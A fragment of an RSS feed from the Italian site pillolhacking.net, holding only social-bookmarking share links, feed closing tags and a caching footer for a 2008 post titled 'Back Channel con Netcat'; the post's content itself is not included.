src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Back Channel con Netcat' a Segnalo" alt="Aggiungi 'Back Channel con Netcat' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Back Channel con Netcat' a OKnotizie" alt="Aggiungi 'Back Channel con Netcat' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Back Channel con Netcat' a Diggita" alt="Aggiungi 'Back Channel con Netcat' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;t=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Back Channel con Netcat' a FaceBook" alt="Aggiungi 'Back Channel con Netcat' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/&amp;title=Back+Channel+con+Netcat" title="Aggiungi 'Back Channel con Netcat' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Back Channel con Netcat' a Upnews" alt="Aggiungi 'Back Channel con Netcat' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Back Channel con Netcat' a NotizieFlash" alt="Aggiungi 'Back Channel con Netcat' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Back Channel con Netcat' a Twitter" alt="Aggiungi 'Back Channel con Netcat' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Back Channel con Netcat' a Technotizie" alt="Aggiungi 'Back Channel con Netcat' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Back+Channel+con+Netcat&amp;url=http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/" title="Aggiungi 'Back Channel con Netcat' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Back Channel con Netcat' a FriendFeed" alt="Aggiungi 'Back Channel con Netcat' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2008/11/25/back-channel-con-netcat/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced

Served from: www.pillolhacking.net @ 2012-02-05 10:25:44 -->
